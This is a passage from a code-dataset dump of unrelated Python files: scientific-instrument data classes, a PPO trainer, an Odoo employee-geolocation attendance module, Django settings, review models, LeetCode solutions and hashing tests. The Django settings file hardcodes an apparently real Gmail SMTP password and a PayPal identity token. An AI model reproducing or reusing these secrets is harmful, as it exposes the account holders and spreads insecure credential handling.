Object containing the ParamSpecs of a given run\n \"\"\"\n\n def __init__(self, *paramspecs: ParamSpec) -> None:\n\n for paramspec in paramspecs:\n if not isinstance(paramspec, ParamSpec):\n raise ValueError('Got invalid input. 
All paramspecs must be '\n f'ParamSpecs, but {paramspec} is of type '\n f'{type(paramspec)}.')\n\n self.paramspecs = paramspecs\n\n def __repr__(self) -> str:\n output = self.__class__.__name__\n tojoin = (str(paramspec) for paramspec in self.paramspecs)\n output += f'({\", \".join(tojoin)})'\n return output\n\n def __eq__(self, other) -> bool:\n if not isinstance(other, InterDependencies):\n return False\n if not self.paramspecs == other.paramspecs:\n return False\n return True\n\n def serialize(self) -> Dict[str, Any]:\n \"\"\"\n Return a serialized version of this object instance\n \"\"\"\n ser = {}\n ser['paramspecs'] = tuple(ps.serialize() for ps in self.paramspecs)\n return ser\n\n @classmethod\n def deserialize(cls, ser: Dict[str, Any]) -> 'InterDependencies':\n \"\"\"\n Create an InterDependencies object from a serialization of an\n instance\n \"\"\"\n paramspecs = [ParamSpec.deserialize(sps) for sps in ser['paramspecs']]\n idp = cls(*paramspecs)\n return idp\n","sub_path":"qcodes/dataset/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"608544653","text":"\nimport random\nimport os\n\nimport torch\nimport torch.nn as nn\n\nfrom src.problem.portfolio.learning.actor_critic import ActorCritic\n\n\nclass BrainPPO:\n \"\"\"\n Definition of the PPO Brain, computing the DQN loss\n \"\"\"\n def __init__(self, args, n_feat):\n \"\"\"\n Initialize the PPO Brain\n :param args: argparse object taking hyperparameters\n :param n_feat: number of features on the items\n \"\"\"\n self.args = args\n self.policy = ActorCritic(self.args, n_feat)\n self.policy_old = ActorCritic(self.args, n_feat)\n self.policy_old.load_state_dict(self.policy.state_dict())\n\n self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=args.learning_rate)\n self.MseLoss = nn.MSELoss()\n\n if args.mode == 'gpu':\n self.policy.cuda()\n self.policy_old.cuda()\n\n def update(self, memory):\n \"\"\"\n Compute the loss and update the NN weights through backpropagation of the loss\n :param memory: the replay-memory of samples\n \"\"\"\n\n # accumulated rewards collected on the current episodes for each sample of the memory:\n rewards = []\n acc_reward = 0\n\n for reward, is_terminal in zip(reversed(memory.rewards), reversed(memory.is_terminals)):\n if is_terminal:\n acc_reward = 0\n acc_reward = reward + acc_reward\n rewards.insert(0, acc_reward)\n\n # Optimize the policy for K epochs:\n for k in range(self.args.k_epochs):\n\n mem = list(zip(memory.actions, memory.availables, memory.states, memory.log_probs, rewards))\n random.shuffle(mem)\n mem_actions, mem_availables, mem_states, mem_log_probs, mem_rewards = zip(*mem)\n\n n_batch = self.args.update_timestep // self.args.batch_size\n\n for j in range(n_batch):\n\n start_idx = j * self.args.batch_size\n end_idx = (j + 1) * self.args.batch_size - 1\n\n old_states_for_action = torch.stack(mem_states[start_idx:end_idx])\n old_states_for_value = torch.stack(mem_states[start_idx:end_idx])\n old_actions = torch.stack(mem_actions[start_idx:end_idx])\n old_log_probs = torch.stack(mem_log_probs[start_idx:end_idx])\n old_availables = torch.stack(mem_availables[start_idx:end_idx])\n rewards_tensor = torch.tensor(mem_rewards[start_idx:end_idx])\n\n if self.args.mode == 'gpu':\n old_states_for_action.cuda()\n old_states_for_value.cuda()\n old_actions = old_actions.cuda()\n old_log_probs = old_log_probs.cuda()\n old_availables = 
old_availables.cuda()\n rewards_tensor = rewards_tensor.cuda()\n\n # Evaluating old actions and values\n log_probs, state_values, dist_entropy = self.policy.evaluate(old_states_for_action,\n old_states_for_value, old_actions,\n old_availables)\n\n # Probability ratio between the old and the new policies\n ratios = torch.exp(log_probs - old_log_probs.detach())\n\n # Advantage function\n advantages = rewards_tensor - state_values.detach()\n\n # PPO loss value\n surrogate_1 = ratios * advantages\n surrogate_2 = torch.clamp(ratios, 1 - self.args.eps_clip, 1 + self.args.eps_clip) * advantages\n\n loss = - torch.min(surrogate_1, surrogate_2) + 0.5 * self.MseLoss(state_values, rewards_tensor) \\\n - self.args.entropy_value * dist_entropy\n\n self.optimizer.zero_grad()\n\n loss.mean().backward()\n\n self.optimizer.step()\n\n # Copy new weights into old policy\n self.policy_old.load_state_dict(self.policy.state_dict())\n\n def save(self, folder, filename):\n \"\"\"\n Save the model\n :param folder: Folder requested\n :param filename: file name requested\n \"\"\"\n\n filepath = os.path.join(folder, filename)\n\n if not os.path.exists(folder):\n os.mkdir(folder)\n torch.save(self.policy_old.state_dict(), filepath)\n","sub_path":"src/problem/portfolio/learning/brain_ppo.py","file_name":"brain_ppo.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"354391455","text":"# -*- coding: utf-8 -*-\n#################################################################################\n# Author : Acespritech Solutions Pvt. Ltd. (<www.acespritech.com>)\n# Copyright(c): 2012-Present Acespritech Solutions Pvt. Ltd.\n# All Rights Reserved.\n#\n# This program is copyright property of the author mentioned above.\n# You can't redistribute it and/or modify it.\n#\n#################################################################################\n\n\nfrom odoo import fields, models, api, _, exceptions\nfrom odoo.http import request\nfrom datetime import datetime\nimport logging, requests, platform\nimport httpagentparser\n_logger = logging.getLogger(__name__)\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n google_api_key = fields.Char(string='Google API KEY')\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n res.update(google_api_key=self.env['ir.config_parameter'].sudo().get_param('aspl_employee_attendance_map.google_api_key'))\n return res\n\n @api.multi\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('aspl_employee_attendance_map.google_api_key', self.google_api_key)\n\n\nclass HrAttendance(models.Model):\n _inherit = 'hr.attendance'\n\n location_name = fields.Char(string=\"Location Name\")\n latitude = fields.Char(string=\"Latitude\")\n longitude = fields.Char(string=\"Longitude\")\n os_name = fields.Char(string=\"Operating System\")\n browser_name = fields.Char(string=\"Browser\")\n\n\nclass HrEmployee(models.Model):\n _inherit = 'hr.employee'\n\n @api.multi\n def attendance_manual(self, next_action, entered_pin=None, latitude=None, longitude=None):\n return self.attendance_action(next_action, entered_pin, latitude, longitude)\n\n @api.multi\n def attendance_action(self, next_action, entered_pin=None, latitude=None, longitude=None):\n self.ensure_one()\n action_message = self.env.ref('hr_attendance.hr_attendance_action_greeting_message').read()[0]\n 
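# enrich the greeting action with the previous check-in/out time, the employee name and the follow-up action\n 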
action_message['previous_attendance_change_date'] = self.last_attendance_id and (\n self.last_attendance_id.check_out or self.last_attendance_id.check_in) or False\n action_message['employee_name'] = self.name\n action_message['next_action'] = next_action\n if self.user_id:\n modified_attendance = self.sudo(self.user_id.id).attendance_action_change(latitude, longitude)\n else:\n modified_attendance = self.sudo().attendance_action_change(latitude, longitude)\n action_message['attendance'] = modified_attendance.read()[0]\n return {'action': action_message}\n\n @api.multi\n def attendance_action_change(self, latitude=None, longitude=None):\n \"\"\" Check In/Check Out action\n Check In: create a new attendance record\n Check Out: modify check_out field of appropriate attendance record\n \"\"\"\n if len(self) > 1:\n raise exceptions.UserError(_('Cannot perform check in or check out on multiple employees.'))\n action_date = fields.Datetime.now()\n agent = request.httprequest.environ.get('HTTP_USER_AGENT')\n agent_details = httpagentparser.detect(agent)\n user_os = agent_details['os']['name']\n browser_name = agent_details['browser']['name']\n bit_type = platform.architecture()\n key = self.env['ir.config_parameter'].sudo().get_param('aspl_employee_attendance_map.google_api_key')\n api_response = requests.get(\n 'https://maps.googleapis.com/maps/api/geocode/json?latlng=%s,%s&key=%s' % (latitude, longitude, key))\n api_response_dict = api_response.json()\n if self.attendance_state != 'checked_in':\n vals = {\n 'employee_id': self.id,\n 'check_in': action_date\n }\n if latitude and longitude:\n if api_response_dict['status'] == 'OK':\n vals.update({\n 'longitude': longitude,\n 'latitude': latitude,\n 'os_name': user_os + \", \" + bit_type[0],\n 'browser_name': browser_name,\n 'location_name': api_response_dict['results'][0]['formatted_address'],\n })\n return self.env['hr.attendance'].create(vals)\n else:\n return self.env['hr.attendance'].create(vals)\n else:\n attendance = self.env['hr.attendance'].search([('employee_id', '=', self.id), ('check_out', '=', False)], limit=1)\n if attendance:\n attendance.check_out = action_date\n else:\n raise exceptions.UserError(('Cannot perform check out on %(empl_name)s, could not find corresponding check in. 
'\n 'Your attendances have probably been modified manually by human resources.') % {\n 'empl_name': self.name, })\n return attendance\n\n\nclass EmployeeAttendanceMap(models.Model):\n _name = 'employee.attendance.map'\n\n employee_ids = fields.Many2many('hr.employee', string=\"Employees\")\n attendance_date = fields.Date(string=\"Date\", required=True)\n department_id = fields.Many2one('hr.department', string=\"Department\")\n job_position = fields.Many2one('hr.job', string=\"Job Position\")\n\n @api.multi\n def show_map(self):\n try:\n response = requests.get(\"http://www.google.com\")\n check_connection = True\n except requests.ConnectionError:\n check_connection = False\n attendance_obj = self.env['hr.attendance']\n result = []\n result.append({'connection': check_connection})\n\n domain = []\n if self.employee_ids:\n domain += [('id', 'in', self.employee_ids.ids)]\n if self.department_id:\n domain += [('department_id', '=', self.department_id.id)]\n if self.job_position:\n domain += [('job_id', '=', self.job_position.id)]\n employee_ids = self.env['hr.employee'].search(domain)\n if employee_ids:\n emp_detail = attendance_obj.search([('employee_id', 'in', employee_ids.ids)])\n for each_emp in emp_detail:\n emp_date = datetime.strptime(str(each_emp.check_in), '%Y-%m-%d %H:%M:%S')\n select_date = datetime.strptime(str(self.attendance_date), '%Y-%m-%d')\n new_emp_date = datetime.date(emp_date)\n new_select_date = datetime.date(select_date)\n if new_emp_date == new_select_date:\n result.append({'latitude': each_emp.latitude,\n 'longitude': each_emp.longitude,\n 'os_name': each_emp.os_name,\n 'name': each_emp.employee_id.name,\n 'emp_id': each_emp.employee_id.id,\n 'image': each_emp.employee_id.image,\n 'date': self.attendance_date,\n 'dept_id': self.department_id.id,\n 'job_position': self.job_position.id\n })\n else:\n continue\n return result\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"addons/aspl_employee_attendance_map/models/hr_attendance.py","file_name":"hr_attendance.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"613405510","text":"# -*- encoding: utf-8 -*-\n\nimport os\nbase_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), os.path.pardir)\n\nfrom django.conf import global_settings\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nWEBSITE_NAME = 'OpenReader'\nWEBSITE_DOMAIN = 'http://127.0.0.1:8000'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'openreader',\n 'USER': 'openreader',\n 'PASSWORD': 'openreader',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nADMINS = ()\nMANAGERS = ADMINS\n\nTIME_ZONE = 'Asia/Bangkok'\nLANGUAGE_CODE = 'th'\n\ngettext = lambda s: s\nLANGUAGES = (\n ('en', gettext('English')),\n ('th', gettext('Thai')),\n)\n\nLOCALE_PATHS = (\n os.path.join(base_path, 'locale'),\n)\n\nSITE_ID = 1\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nMEDIA_ROOT = os.path.join(base_path, 'media/')\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = os.path.join(base_path, 'sitestatic/')\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(base_path, 'static'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n # 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n 'LOCATION': 
os.path.join(base_path, 'media/cache/'),\n }\n}\n\nSECRET_KEY = 'THIS IS A SECRET KEY'\n\nAUTH_PROFILE_MODULE = 'domain.UserProfile'\nLOGIN_REDIRECT_URL = '/'\n\nAUTHENTICATION_BACKENDS = (\n 'openreader.backends.EmailAuthenticationBackend',\n 'openreader.backends.InvitationAuthenticationBackend',\n 'django.contrib.auth.backends.RemoteUserBackend',\n 'django.contrib.auth.backends.ModelBackend',\n )\n\nFILE_UPLOAD_HANDLERS = ('openreader.handlers.UploadProgressCachedHandler', ) + global_settings.FILE_UPLOAD_HANDLERS\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n # 'django.template.loaders.eggs.Loader',\n)\n\nROOT_URLCONF = 'openreader.urls'\nWSGI_APPLICATION = 'openreader.wsgi.application'\n\nTEMPLATE_DIRS = (\n os.path.join(base_path, 'templates'),\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.contrib.messages.context_processors.messages',\n 'django.core.context_processors.request',\n 'openreader.context.constants',\n)\n\nMIDDLEWARE_CLASSES = (\n 'openreader.middleware.AJAXSimpleExceptionResponse',\n 'openreader.http.Http403Middleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.transaction.TransactionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.RemoteUserMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n\n 'pagination.middleware.PaginationMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'private_files',\n\n 'pagination',\n 'debug_toolbar',\n 'djcelery',\n 'djkombu',\n 'paypal.standard.pdt',\n \n 'accounts',\n 'domain',\n 'presentation',\n\n 'api',\n 'common',\n 'management',\n)\n\nOPENREADER_LOGGER = 'openreader'\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'default': {\n 'format': '%(levelname)s %(asctime)s %(filename)s:%(lineno)d %(message)s'\n }\n },\n 'handlers': {\n 'file': {\n 'class': 'logging.FileHandler',\n 'filename': MEDIA_ROOT + '/openreader.log',\n 'formatter':'default'\n }\n },\n 'loggers': {\n OPENREADER_LOGGER: {\n 'handlers': ['file'],\n 'level': 'DEBUG'\n },\n }\n}\n\n# Email\n\n#EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nEMAIL_DOMAIN_NAME = 'localhost'\n\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = 'application.testbed@gmail.com'\nEMAIL_HOST_PASSWORD = 'opendreamqwer'\nEMAIL_PORT = 587\n\nEMAIL_ADDRESS_NO_REPLY = 'noreply@' + EMAIL_DOMAIN_NAME\n\n########## Django Debug Toolbar ##########\n\nINTERNAL_IPS = ('127.0.0.1',)\nDEBUG_TOOLBAR_CONFIG = {\n 'INTERCEPT_REDIRECTS': False,\n }\n\n########## Django Celery ##########\n\nimport djcelery\ndjcelery.setup_loader()\n\n# BROKER_URL = \"redis://localhost:6379/0\"\n\n# BROKER_HOST = \"localhost\"\n# BROKER_PORT = 5672\n# BROKER_USER = \"guest\"\n# BROKER_PASSWORD = 
\"guest\"\n# BROKER_VHOST = \"/\"\n\n# BROKER_TRANSPORT = 'redis'\n\nBROKER_BACKEND = \"djkombu.transport.DatabaseTransport\"\n#celery\nBROKER_HOST = \"localhost\"\nBROKER_PORT = 5672\nBROKER_USER = \"guest\"\nBROKER_PASSWORD = \"guest\"\nBROKER_VHOST = \"/\"\n\nfrom celery.schedules import crontab\nfrom datetime import timedelta\nfrom domain import tasks\n\nTEST_PAYMENT_REMIND_EVERY_HOUR = False\n\nCELERYBEAT_SCHEDULE = {\n 'decide-on-first-month-everydays': {\n 'task': 'tasks.send_notification_email_to_decide_on_first_month',\n 'schedule': crontab(hour=0, minute=0),\n },\n # 'decide-on-first-month-test-every-10-seconds': {\n # 'task': 'tasks.send_notification_email_to_decide_on_first_month',\n # 'schedule': timedelta(seconds=30),\n # },\n 'pay-service-everydays': {\n 'task': 'tasks.send_notification_email_to_pay_service',\n 'schedule': crontab(hour=0, minute=0),\n },\n}\n\nif TEST_PAYMENT_REMIND_EVERY_HOUR:\n CELERYBEAT_SCHEDULE.update({\n 'pay-service-test-everyhour': {\n 'task': 'tasks.send_notification_email_to_pay_service',\n 'schedule': crontab(hour='*/1', minute=0),\n },\n })\n\n########## Django Private Files ##########\n\nFILE_PROTECTION_METHOD = 'basic'\n\n########## Django Pagination ##########\n\nPAGINATION_DEFAULT_PAGINATION = 50\n\n########## Open Reader Settings ##########\n\nPUBLICATION_PREFIX = '/publication'\nPUBLICATION_ROOT = MEDIA_ROOT + PUBLICATION_PREFIX\n\nMAX_PUBLICATION_FILE_SIZE = 300000000 # 300mb\nMAX_PUBLICATION_FILE_SIZE_TEXT = '300 เมกะไบต์'\n\n# Publication Download\n\nDOWNLOAD_LINK_EXPIRE_IN = 180 # Minutes\n\n# Thumbnail\nTHUMBNAIL_ROOT = PUBLICATION_ROOT + '/thumbnails'\nTHUMBNAIL_TEMP_ROOT = MEDIA_ROOT + '/thumbnails_temp' # Use when generating thumbnails\nTHUMBNAIL_URL = MEDIA_URL + '/publication/thumbnails'\n\nTHUMBNAIL_SIZES = (\n ('small', (70, 85)),\n ('large', (200, 250)),\n)\n\n# Set to False if server can generate thumbnail 99%\nTHUMBNAIL_REGENERATE = True\n\n# Shelf Icons\nDEFAULT_SHELF_ICON = 'basic1-006'\nSHELF_ICONS = ['basic1-006', 'basic1-041', 'basic1-049', 'basic1-052', 'basic1-054', 'basic1-106', 'basic1-129', 'basic2-001', 'basic2-011', 'basic2-018', 'basic2-057', 'basic2-092', 'basic2-096', 'basic2-102', 'basic2-106', 'basic2-114', 'basic2-117', 'basic2-142', 'basic2-197', 'basic2-238', 'basic2-253', 'basic2-256', 'basic2-258', 'basic2-267', 'basic2-268']\n\n# PAYPAL\nPAYPAL_IDENTITY_TOKEN = 'vhk6xm8LOT2JL_VLuisFQaxam5Ox764-02gQu7hg2SwZDBOUxnQ6CUHqJLO'\nPAYPAL_RECEIVER_EMAIL = 'kengggg@gmail.com'\n\n#######################################################\n\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n","sub_path":"openreader/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"438729622","text":"#-*- encoding=utf-8 -*-\nimport sys\nimport json\nimport queue\nimport threading\n\nimport requests\n\nimport database\nimport netutils\nimport parserutils\n\ndef TestParserUtils():\n session = requests.Session()\n with open('resources/headers.json', 'r', 1) as f:\n session.headers = json.load(f)\n\n homeDownloaderSrc = queue.Queue()\n homeDownloaderLock = threading.Lock()\n\n homeParserSrc = queue.Queue()\n homeParserLock = threading.Lock()\n\n followeeDownloaderSrc = queue.Queue()\n followeeDownloaderLock = threading.Lock()\n\n followeeParserSrc = queue.Queue()\n followeeParserLock = threading.Lock()\n\n followerDownloaderSrc = queue.Queue()\n followerDownloaderLock = threading.Lock()\n\n followerParserSrc = queue.Queue()\n followerParserLock = 
threading.Lock()\n\n homeDownloader = netutils.HomeDownloader(session, homeDownloaderSrc, homeDownloaderLock, homeParserSrc, homeParserLock)\n followeeDownloader = netutils.FolloweeDownloader(session, followeeDownloaderSrc, followeeDownloaderLock, followeeParserSrc, followeeParserLock)\n followerDownloader = netutils.FollowerDownloader(session, followerDownloaderSrc, followerDownloaderLock, followerParserSrc, followerParserLock)\n\n homeParser = parserutils.HomeParser()\n user = homeParser.Get('resources/test/170c887a6f061c0454e7bfc1def7d1ab.home.html')\n for key in user.keys():\n print('%20s: %s' % (key, user[key]))\n\n followeeParser = parserutils.FolloweeParser()\n followee = followeeParser.Get('resources/test/170c887a6f061c0454e7bfc1def7d1ab.followee.html')\n print(len(followee), ': ', followee); print()\n\n followerParser = parserutils.FollowerParser()\n follower = followerParser.Get('resources/test/170c887a6f061c0454e7bfc1def7d1ab.follower.html')\n print(len(follower), ': ', follower); print()\n\nif __name__ == '__main__':\n TestParserUtils()\n","sub_path":"source/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"342990096","text":"from django.contrib.auth.models import User\nfrom django.core.mail import send_mass_mail\nfrom django.db import models\nfrom django.template import Context, Template\n\nfrom symposion.markdown_parser import parse\n\n\nclass ProposalVote(models.Model):\n \"\"\"\n Model to track votes made on a proposal.\n\n This model replaces symposion.reviews.models.Comment,\n symposion.reviews.models.Review, and symposion.reviews.models.LatestVote.\n\n Fields:\n proposal - The proposal associated with this vote.\n voter - The user that made the vote.\n score - The user's vote, represented as two characters.\n comment - The Markdown-formatted text of the vote's comment (optional).\n comment_html - An autogenerated HTML version of the vote's comment.\n date_created - The date/time that the vote was created.\n date_modified - The date/time that the vote was last modified.\n \"\"\"\n\n # These values are based on the historical ones found in\n # symposion.reviews.models.score_expression().\n # This allows us to use integers directly which makes\n # calculating scores easier.\n PLUS_ONE = 3\n PLUS_ZERO = 1\n MINUS_ZERO = -1\n MINUS_ONE = -3\n SCORES = [\n (\n PLUS_ONE,\n \"+1 — Good proposal and I will argue for it to be accepted.\",\n ),\n (\n PLUS_ZERO,\n \"+0 — OK proposal, but I will not argue for it to be accepted.\",\n ),\n (\n MINUS_ZERO,\n \"−0 — Weak proposal, but I will not argue against acceptance.\",\n ),\n (\n MINUS_ONE,\n \"−1 — Serious issues and I will argue to reject this proposal.\",\n ),\n ]\n\n proposal = models.ForeignKey(\n \"proposals.Proposal\",\n on_delete=models.CASCADE,\n related_name=\"review_votes\",\n )\n voter = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"review_votes\"\n )\n score = models.SmallIntegerField(blank=True, choices=SCORES)\n comment = models.TextField(blank=True)\n comment_html = models.TextField(blank=True, editable=False)\n date_created = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n def save(self, *args, **kwargs):\n self.comment_html = parse(self.comment)\n return super(ProposalVote, self).save(*args, **kwargs)\n\n def get_numeric_score_display(self):\n \"\"\"Returns numeric value at beginning of score display string.\"\"\"\n 
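# the display string begins with a two-character score such as \"+1\" or \"−0\"; keep just that token\n 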
return self.get_score_display()[0:2].strip()\n\n\ndef proposalvote_score_cache_key(proposal, voter):\n \"\"\"\n Return the cache key for a ProposalVote's score\n based on the proposal and voting user.\n \"\"\"\n return \"proposalvote_{}_{}_score\".format(proposal.pk, voter.pk)\n\n\nclass ProposalFeedback(models.Model):\n proposal = models.ForeignKey(\n \"proposals.Proposal\",\n on_delete=models.CASCADE,\n related_name=\"review_feedback\",\n )\n author = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"review_feedback\"\n )\n comment = models.TextField(blank=True)\n comment_html = models.TextField(blank=True, editable=False)\n date_created = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n def save(self, *args, **kwargs):\n self.comment_html = parse(self.comment)\n return super(ProposalFeedback, self).save(*args, **kwargs)\n\n\nclass ProposalResult(models.Model):\n \"\"\"\n Model to track whether a proposal's acceptance and notification status.\n\n This model replaces symposion.reviews.models.ProposalResult and\n symposion.reviews.models.ResultNotification.\n \"\"\"\n\n RESULT_ACCEPTED = \"A\"\n RESULT_REJECTED = \"R\"\n RESULT_STANDBY = \"S\"\n RESULT_UNDECIDED = \"U\"\n\n RESULT_STATUSES = [\n (RESULT_UNDECIDED, \"Undecided\"),\n (RESULT_ACCEPTED, \"Accepted\"),\n (RESULT_REJECTED, \"Rejected\"),\n (RESULT_STANDBY, \"Standby\"),\n ]\n\n proposal = models.OneToOneField(\n \"proposals.Proposal\",\n on_delete=models.CASCADE,\n related_name=\"review_result\",\n )\n status = models.CharField(\n choices=RESULT_STATUSES, default=RESULT_UNDECIDED, max_length=1\n )\n\n\nclass ProposalNotification(models.Model):\n \"\"\"Model to track notifications sent to proposal speakers.\"\"\"\n\n from_address = models.EmailField()\n subject = models.CharField(max_length=254)\n body = models.TextField()\n proposals = models.ManyToManyField(\n \"proposals.Proposal\",\n blank=True,\n related_name=\"review_notifications\",\n )\n date_sent = models.DateTimeField(\n verbose_name=\"Date this notification was created and sent\",\n auto_now_add=True,\n )\n\n def __str__(self):\n return \"{}\".format(self.subject)\n\n def send_email(self):\n \"\"\"Returns a list of speakers without email addresses.\"\"\"\n email_messages = []\n unemailed = []\n # Create a message for each email address.\n # This is necessary because we are not using BCC.\n for proposal in self.proposals.all():\n # In order to support the \"variable substitution\"\n # supported by the previous reviews system, the\n # message needs to be templated anew for each\n # proposal.\n message_body = Template(self.body).render(\n Context({\"proposal\": proposal.notification_email_context()})\n )\n for speaker in proposal.speakers():\n if speaker.email:\n datamessage_tuple = (\n self.subject,\n message_body,\n self.from_address,\n [speaker.email],\n )\n email_messages.append(datamessage_tuple)\n else:\n unemailed.append(speaker)\n send_mass_mail(email_messages)\n return unemailed\n","sub_path":"conf_site/reviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"345737809","text":"class Solution:\n # APP1: like fibonicci sequence. 
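ways(n) = ways(n-1) + ways(n-2), so 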
use recursion(dfs)\n # Time: O(2^n) Space: O(1) Runtime: TLE\n # def climbStairs(self, n: int) -> int:\n # if not n or n < 0:\n # return 0\n # if n <= 2:\n # return n\n # return self.climbStairs(n - 1) + self.climbStairs(n - 2)\n\n # APP2: optimize APP1: dfs + memoization\n # Time: O(n) space: O(n) Runtime: 71% memory: 6%\n # def climbStairs(self, n: int) -> int:\n # if not n or n < 0:\n # return 0\n # if n <= 2:\n # return n\n # memo = {1: 1, 2: 2}\n # return self.dfs(n, memo)\n\n # def dfs(self, n, memo):\n # if n in memo:\n # return memo[n]\n # memo[n] = self.dfs(n - 1, memo) + self.dfs(n - 2, memo)\n # return memo[n]\n\n # APP3: DP. Define f[i]: distinct ways to reach ith stairs.\n # f[i] = f[i - 1] + f[i - 2]. ans = f[n - 1]\n # Time: O(n) Space: O(n) Runtime: 98% memory:6%\n # def climbStairs(self, n: int) -> int:\n # if not n or n < 0:\n # return 0\n # if n <= 2:\n # return n\n # f = [1, 2] + [0] * (n - 2)\n # for i in range(2, n):\n # f[i] = f[i -1] + f[i - 2]\n # return f[n - 1]\n\n # APP4: optimize APP3. we only need to know the state of i - 1 and i - 2. Two variables will do\n # Time: O(n) Space: O(1) Runtime: 98% Memory:6%\n def climbStairs(self, n: int) -> int:\n if not n or n < 0:\n return 0\n if n <= 2:\n return n\n a, b = 1, 2\n for i in range(2, n):\n c = a + b\n a, b = b, c\n return c\n","sub_path":"DP/2. Sequence DP/70. Climbing Stairs.py","file_name":"70. Climbing Stairs.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"203766131","text":"from __future__ import print_function, division\n\nimport os\nimport shutil\nimport hashlib\nimport tempfile\nfrom time import sleep, time\n\nimport pytest\nfrom pathspec import RecursionError\n\nfrom dirhash import (\n _get_hasher_factory,\n _get_match_spec,\n get_included_paths,\n dirhash,\n algorithms_available,\n algorithms_guaranteed,\n _empty_dir_descriptor\n)\n\n\nclass TestGetHasherFactory(object):\n\n def test_get_guaranteed(self):\n algorithm_and_hasher_factory = [\n ('md5', hashlib.md5),\n ('sha1', hashlib.sha1),\n ('sha224', hashlib.sha224),\n ('sha256', hashlib.sha256),\n ('sha384', hashlib.sha384),\n ('sha512', hashlib.sha512)\n ]\n assert algorithms_guaranteed == {a for a, _ in algorithm_and_hasher_factory}\n for algorithm, expected_hasher_factory in algorithm_and_hasher_factory:\n hasher_factory = _get_hasher_factory(algorithm)\n assert hasher_factory == expected_hasher_factory\n\n def test_get_available(self):\n for algorithm in algorithms_available:\n hasher_factory = _get_hasher_factory(algorithm)\n hasher = hasher_factory()\n assert hasattr(hasher, 'update')\n assert hasattr(hasher, 'hexdigest')\n\n def test_not_available(self):\n with pytest.raises(ValueError):\n _get_hasher_factory('not available')\n\n def test_bypass_hasher_factory(self):\n\n # test standard hasher\n hasher_factory = _get_hasher_factory(hashlib.sha256)\n assert hasher_factory is hashlib.sha256\n\n # test raise on custom hasher with bad interface\n class IncompleteMockHasher(object):\n\n def __init__(self, *args, **kwargs):\n pass\n\n def update(self, *args, **kwargs):\n pass\n\n with pytest.raises(ValueError):\n _get_hasher_factory(IncompleteMockHasher)\n\n # test custom hasher with ok interface\n class MockHasher(IncompleteMockHasher):\n\n def hexdigest(self):\n return ''\n\n hasher_factory = _get_hasher_factory(MockHasher)\n assert hasher_factory is MockHasher\n\n\nclass TestGetMatchSpec(object):\n\n def test_default_match_all(self):\n ms = 
